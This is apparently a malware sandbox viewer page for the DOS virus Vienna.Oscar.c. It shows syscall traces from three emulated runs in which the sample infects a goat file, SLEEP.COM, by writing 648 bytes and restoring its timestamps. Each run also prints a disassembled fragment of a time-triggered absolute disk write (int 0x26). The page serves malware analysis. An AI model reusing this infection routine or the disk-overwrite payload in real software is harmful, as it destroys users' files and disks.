Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Oscar.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:28.118861435Z 48 PC: 12ba6 | Get DOS version
2018-12-17T22:54:28.120263949Z 47 PC: 12bb2 | Get disk transfer address
2018-12-17T22:54:28.123155779Z 26 PC: 12bc1 | Set disk transfer address
2018-12-17T22:54:28.124333576Z 78 PC: 12c44 | Find first file
2018-12-17T22:54:28.131098186Z 67 PC: 12c7c | Get or set file attributes
2018-12-17T22:54:28.138765354Z 67 PC: 12c8c | Get or set file attributes
2018-12-17T22:54:28.156524343Z 61 PC: 12c96 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:28.163892623Z 87 PC: 12ca2 | Get or set file date and time
2018-12-17T22:54:28.173906877Z 44 PC: 12cac | Get time 0x12cac: cmp dh, 0xa
0x12caf: jne 0x12cd6
0x12cb1: mov ah, 0x30
0x12cb3: int 0x21
0x12cb5: cmp al, 4
0x12cb7: jl 0x12cbc
0x12cb9: jmp 0x12d37
0x12cbb: nop
0x12cbc: mov al, 2
0x12cbe: mov cx, 9
0x12cc1: mov dx, 0
0x12cc4: mov bx, si
0x12cc6: sub bx, 0x10
0x12cc9: push bp
0x12cca: int 0x26
0x12ccc: jb 0x12cd2
0x12cce: xor ax, ax
0x12cd0: jmp 0x12d37
0x12cd2: pop bx
0x12cd3: pop bp
2018-12-17T22:54:28.17626992Z 63 PC: 12ce2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:54:28.183840724Z 66 PC: 12cf4 | Move file pointer
2018-12-17T22:54:28.210681719Z 64 PC: 12d17 | Write file or device (Write 648 bytes on handle 5)
2018-12-17T22:54:28.221134122Z 66 PC: 12d29 | Move file pointer
2018-12-17T22:54:28.223141379Z 64 PC: 12d37 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:54:28.231839868Z 87 PC: 12d48 | Get or set file date and time
2018-12-17T22:54:28.233729612Z 62 PC: 12d4c | Close file
2018-12-17T22:54:28.242586536Z 67 PC: 12d59 | Get or set file attributes
2018-12-17T22:54:28.259342474Z 26 PC: 12d63 | Set disk transfer address
2018-12-17T22:54:28.260727473Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-17T22:54:28.265456008Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":10,"TimeBased":true,"OriginalID":11563,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:50.714206438Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:30:50.715623579Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:30:50.716685135Z 26 PC: 12bc1 | Set disk transfer address
2018-12-25T12:30:50.717565966Z 78 PC: 12c44 | Find first file
2018-12-25T12:30:50.721387978Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:30:50.725262747Z 67 PC: 12c8c | Get or set file attributes
2018-12-25T12:30:50.739502185Z 61 PC: 12c96 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:50.751316751Z 87 PC: 12ca2 | Get or set file date and time
2018-12-25T12:30:50.753607061Z 44 PC: 12cac | Get time 0x12cac: cmp dh, 0xa
0x12caf: jne 0x12cd6
0x12cb1: mov ah, 0x30
0x12cb3: int 0x21
0x12cb5: cmp al, 4
0x12cb7: jl 0x12cbc
0x12cb9: jmp 0x12d37
0x12cbb: nop
0x12cbc: mov al, 2
0x12cbe: mov cx, 9
0x12cc1: mov dx, 0
0x12cc4: mov bx, si
0x12cc6: sub bx, 0x10
0x12cc9: push bp
0x12cca: int 0x26
0x12ccc: jb 0x12cd2
0x12cce: xor ax, ax
0x12cd0: jmp 0x12d37
0x12cd2: pop bx
0x12cd3: pop bp
2018-12-25T12:30:50.756104647Z 63 PC: 12ce2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:50.762746104Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:30:50.765422228Z 64 PC: 12d17 | Write file or device (Write 648 bytes on handle 5)
2018-12-25T12:30:50.773499676Z 66 PC: 12d29 | Move file pointer
2018-12-25T12:30:50.774704831Z 64 PC: 12d37 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:50.77939129Z 87 PC: 12d48 | Get or set file date and time
2018-12-25T12:30:50.780565524Z 62 PC: 12d4c | Close file
2018-12-25T12:30:50.785548378Z 67 PC: 12d59 | Get or set file attributes
2018-12-25T12:30:50.88938781Z 26 PC: 12d63 | Set disk transfer address
2018-12-25T12:30:50.890804002Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:30:50.894502436Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11563,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:50.834929294Z 48 PC: 12ba6 | Get DOS version
2018-12-25T12:30:50.836255748Z 47 PC: 12bb2 | Get disk transfer address
2018-12-25T12:30:50.838579068Z 26 PC: 12bc1 | Set disk transfer address
2018-12-25T12:30:50.840453734Z 78 PC: 12c44 | Find first file
2018-12-25T12:30:50.847707127Z 67 PC: 12c7c | Get or set file attributes
2018-12-25T12:30:50.855202168Z 67 PC: 12c8c | Get or set file attributes
2018-12-25T12:30:50.872647352Z 61 PC: 12c96 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:50.880388173Z 87 PC: 12ca2 | Get or set file date and time
2018-12-25T12:30:50.883612546Z 44 PC: 12cac | Get time 0x12cac: cmp dh, 0xa
0x12caf: jne 0x12cd6
0x12cb1: mov ah, 0x30
0x12cb3: int 0x21
0x12cb5: cmp al, 4
0x12cb7: jl 0x12cbc
0x12cb9: jmp 0x12d37
0x12cbb: nop
0x12cbc: mov al, 2
0x12cbe: mov cx, 9
0x12cc1: mov dx, 0
0x12cc4: mov bx, si
0x12cc6: sub bx, 0x10
0x12cc9: push bp
0x12cca: int 0x26
0x12ccc: jb 0x12cd2
0x12cce: xor ax, ax
0x12cd0: jmp 0x12d37
0x12cd2: pop bx
0x12cd3: pop bp
2018-12-25T12:30:50.886908718Z 63 PC: 12ce2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:50.893911329Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:30:50.89598946Z 64 PC: 12d17 | Write file or device (Write 648 bytes on handle 5)
2018-12-25T12:30:50.921590138Z 66 PC: 12d29 | Move file pointer
2018-12-25T12:30:50.923156454Z 64 PC: 12d37 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:50.930455988Z 87 PC: 12d48 | Get or set file date and time
2018-12-25T12:30:50.932617411Z 62 PC: 12d4c | Close file
2018-12-25T12:30:50.941319713Z 67 PC: 12d59 | Get or set file attributes
2018-12-25T12:30:50.952434346Z 26 PC: 12d63 | Set disk transfer address
2018-12-25T12:30:50.954706691Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=0000014Dh/0000000333d bytes. ')
2018-12-25T12:30:50.961265143Z 76 PC: 12a86 | Terminate with return code (Return code = '36')